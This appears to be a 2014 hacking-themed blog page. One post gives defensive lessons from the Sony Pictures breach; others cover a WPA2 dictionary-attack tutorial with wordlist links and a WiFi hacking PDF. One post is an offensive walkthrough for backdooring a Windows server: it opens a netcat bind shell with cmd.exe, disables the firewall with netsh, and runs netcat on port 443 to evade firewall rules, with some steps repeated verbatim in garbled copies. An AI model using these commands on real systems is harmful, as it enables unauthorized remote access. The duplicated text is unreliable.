Best Cyber trend news:
https://www.riskbasedsecurity.com/2014/12/a-breakdown-and-analysis-of-the-december-2014-sony-hack/
Keep your self up to date!
Friday, 26 December 2014
The Sony Pictures Hack: 5 short sharp lessons we all can learn!
The recent hacking of Sony Pictures offers valuable lessons in cybersecurity from which every company and consumer can learn. When you set aside the politics and gossip about nation states and Hollywood celebs, some practical implications are clear:
1. Don’t use email for sensitive communications
Why? If you need to ask you haven’t been reading the emails that hackers found on Sony Pictures’ computers and then leaked over the last few weeks. These join the countless other embarrassing and/or incriminating emails and images leaked over the years from assorted companies and government agencies. As the lawsuits against Sony Pictures mount, plaintiffs already possess evidence of the company’s lack of due care, no subpoena required. This evidence includes a critical IT auditor’s report that was reportedly shared via email as an unencrypted attachment.
Just to be clear: email is not a secure channel of communication. By default, email travels in plain text, readable to anyone snooping on the many connections and servers through which it travels. And emails that you send to someone are only as secure as that recipient and their computer. As for sharing sensitive documents as unencrypted email attachments, that should be against company policy, with severe repercussions for violators, whether they are C-level executives or hourly employees.
A good rule to live by is this: Never put anything in a digital communication that you wouldn’t want your mother (or enemies) to see. At this point in time, and for the foreseeable future, nobody can guarantee that those digital communications will never be hacked, leaked, subpoenaed, or otherwise made public. This applies to text messages, comments on web pages, messages on forums, and picture-sharing as well as email. In other words, this is really basic cyber-hygiene that has been common knowledge for decades, a fact that makes Sony Pictures’ apparent ignorance of digital realities all the more shocking.
2. Don’t give everybody access to everything
We’ve said it before and we’ll say it again: classify your documents and segment your networks. Sony Pictures could have saved itself a lot of grief if it had been enforcing a classification system that branded documents like contracts with actors and directors as Top Secret, and a policy that forbid the storing of Top Secret documents in an Internet accessible database. Too many organizations have grown their networks with maximum convenience in mind, effectively giving access to everything to everyone. Unfortunately, that means access to outsiders as well if there is even a small chink in your cyber-defenses.
Networks need to be segmented, with access controls between them to limit who can see what. Target learned this lesson the hard way last year, when hackers found it was possible to get from a supplier portal that the retailer had created, all the way to the card payment terminals in its stores. Now would be a good time to audit your networks for inappropriate connections and unfiltered access.
3. Don’t store passwords in a file called passwords
This lesson is as head-slappingly obvious as “Don’t write down your workstation password on a Post-it note and stick it to your monitor.” Yes, passwords are a pain, but there are secure methods of managing them. The failure of Sony Pictures to enforce a policy of not storing passwords in plain-easy-to-read-text will be one of the biggest strikes against them in court when employees whose privacy was violated in this attack bring suits claiming negligence.
4. Don’t ignore warning signs and risks
Many “ordinary” computer users already know this: if something seems wrong, don’t ignore it. Take a screenshot, write down the error message, call support, run an antivirus scan. Sometimes it turns out to be nothing, or even a new feature you didn’t know about. Other times it means you are under attack. Various parts of the Sony empire have been under attack for years now and many attacks have succeeded. That should have told Sony executives that IT security was a priority, even before Sony Pictures decided to proceed with a movie that was 100% guaranteed to upset at least one nuclear-armed nation already suspected of carrying out cyber attacks. Consider this statement:
“I’ve lost count of how many times Sony’s online properties have been hacked now—I just don’t have that many fingers—but it’s happened again. Databases used to operate sonypictures.com, sonybmg.nl, and sonybmg.be have been compromised…using SQL injection…being susceptible to SQL injection is embarrassing enough…but what makes this hack even worse is the data that has been compromised…with one major feature in common: they included plaintext passwords.”
That was Peter Bright writing in Ars Technica in June of 2011. Three years later, in June of 2014, Sony Pictures released a teaser trailer for The Interview, a film graphically depicting the North Korean dictator’s head exploding (in a sequence without which the director Seth Rogen, complained “the joke won’t”). In other words, Sony was forewarned, but not forearmed. We see a past history of weak security combined with a failure to tighten the hatches before proceeding with a project that was bound to cause anger in at least one part of the world.
5. Don’t go another day without an incident response plan
When news of the Sony Pictures breach started to leak, the company’s response demonstrated a lack of planning. Actions taken were sometimes contradictory or inflammatory. In short, the company clearly lacked an appropriate incident response plan. Why this should be is hard to fathom. One of the most consistent themes in IT security publications over the past few years has been: It’s not if you get hacked but when. In other words, any responsible organization will put in place a plan for responding to a breach. And stick to it when a breach occurs. Here’s a link to some good incident response advice that has been freely available for several years: NIST Special Publication 800-61 Revision 2: Computer Security Incident Handling Guide (.pdf).
Summary and sympathy
Some of these lessons are stark and obvious, but they should not obscure the fact that Sony Pictures has been victimized by criminal hackers. Drawing lessons from a crime is not the same as “victim blaming”. The failure to lock the door of your car does not make you culpable if it is stolen. We should never accept that crime is inevitable. At the same time, there are many layers of victimization in a crime of this magnitude. Current and former Sony employees who have had their lives turned upside down by the breach of privacy that these criminal hackers perpetrated have every right to seek redress from an organization that could fairly be said, just on the evidence published so far, to have failed the standard of due care for protection of its employees.
For additional perspective on this evolving situation, there is a good article in Businessweek and a detailed timeline on this blog. You might also want to monitor Krebs on Security, from Brian Krebs (he’s the guy who broke the Target breach story about this time last year, some lessons from which Sony failed to learned).
Saturday, 6 December 2014
HOW TO CRACK WPA2 USING A DICTIONARY ATTACK
Here is a tutorial showing you how to hack a WPA2 Wifi password by capturing a 4 way handshake and then running a dictionary attack against the capture file.
If you require a wordlist then i have linked a few below this video:
- http://ftp.sunet.se/pub/security/too…all/wordlists/
- ftp://ftp.ox.ac.uk/pub/wordlists/
- http://gdataonline.com/downloads/GDict/
- ftp://ftp.openwall.com/pub/wordlists/
- ftp://ftp.cerias.purdue.edu/pub/dict/
- http://www.indianz.ch/tools/doc/wordlist.zip
- http://www.outpost9.com/files/WordLists.html
- ftp://ftp.openwall.com/pub/wordlists/passwords/
- English and French: https://www.securinfos.info/wordlists_dictionnaires.php
- Virtually every language: ftp://ftp.ox.ac.uk/pub/wordlists/
- http://www.lostpassword.com/f/wl/bigdict.zip
- http://www.lostpassword.com/f/wl/French.zip
- http://www.lostpassword.com/f/wl/Spanish.zip
- http://www.lostpassword.com/f/wl/German.zip
- http://www.vulnerabilityassessment.co.uk/passwords.htm
- http://packetstormsecurity.org/Crackers/wordlists/
- http://www.ai.uga.edu/ftplib/natural-language/moby/
- Cotse has possibly one of the largest collections of word lists (including French). http://www.cotse.com
- http://www.cotse.com/tools/wordlists1.htm
- http://www.cotse.com/tools/wordlists2.htm
Best of Luck guys!
HOW TO BYPASSING FIREWALL ON A WEB SERVER
The key point of this paper is to discuss how to backdoor a windows test server and bypass its’ firewall.
So this is a few steps to bypass firewall easily:
Tools:
1. Netcat
For those who don’t know how to make netcat backdoor, must read this. If you’re just interested to bypassing firewall skip it.
Very first I will show you to make a backdoor using net cat:
Upload netcat on remote pc and making a listening port.
For example.
C:\>nc –l –p 8080
[on 192.168.9.2]
So here we are making 8080 as the listening port
The next step is to connect 192.168.9.2 through remote system.
For that we need to install netcat on 192.168.9.2 and execute cmd prompt.
So here is the command we need to run on 192.168.9.2
C:\>nc –l –p 8080 –e cmd.exe
For example.
C:\>nc –l –p 8080
[on 192.168.9.2]
So here we are making 8080 as the listening port
The next step is to connect 192.168.9.2 through remote system.
For that we need to install netcat on 192.168.9.2 and execute cmd prompt.
So here is the command we need to run on 192.168.9.2
C:\>nc –l –p 8080 –e cmd.exe
u can use putty to connect
Just type the address 192.168.9.2 and specify the port no. 8080
Once u connect u will get the command prompt this way u can make a backdoor connect
on win server.
After getting the command prompt u can disable firewall if required by command line
C:\>netsh firewall set opmode disable
Or
Use
C:\Windows\System32\netsh.exe “firewall set opmode = DISABLE profile = ALL”
Just type the address 192.168.9.2 and specify the port no. 8080
Once u connect u will get the command prompt this way u can make a backdoor connect
on win server.
After getting the command prompt u can disable firewall if required by command line
C:\>netsh firewall set opmode disable
Or
Use
C:\Windows\System32\netsh.exe “firewall set opmode = DISABLE profile = ALL”
when it comes to real scenario – most of the web servers block rdp connection in the sense they block inbound traffic on port no. 3389
[IIS Webserver]————-[=Firewall=]————-attacker
So the firewall rules will be
Allow traffic on 80, 443. Deny all * exception on 80 and 443*
So when we try to make rdp connection from external network it fails. There are few methods where we can trick the firewall by running netcat on 443 or anyother open port on server. We just need to run netcat on 443 because the firewall allows 443 traffic.
[IIS Webserver]————-[=Firewall=]————-attacker
So the firewall rules will be
Allow traffic on 80, 443. Deny all * exception on 80 and 443*
So when we try to make rdp connection from external network it fails. There are few methods where we can trick the firewall by running netcat on 443 or anyother open port on server. We just need to run netcat on 443 because the firewall allows 443 traffic.
OR YOU CAN USE RDP
The tools specified above can be freely downloaded online. You can contact me on egbe201@yahoo.com for further information. Best of Luck!
Wednesday, 3 December 2014
DOWNLOAD FREE WIFI HACKING AND DEFENCE
(PDF PRESENTATION)-This is only for
educational purpose!
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Here is a Free WiFi Hacking PDF that will teach you how all about how the 802.11 protocol works as well as how to hack WEP, WPA, WPA2 and WPS as well as how to protect against it.
1 – The following discussion is for informational and education purpose only.
2 – Hacking into private network without the written permission from the owner is Illegal and strictly forbidden.
3 – Misused could result in breaking the law so use it at your own risk.
2 – Hacking into private network without the written permission from the owner is Illegal and strictly forbidden.
3 – Misused could result in breaking the law so use it at your own risk.
Subscribe to:
Posts (Atom)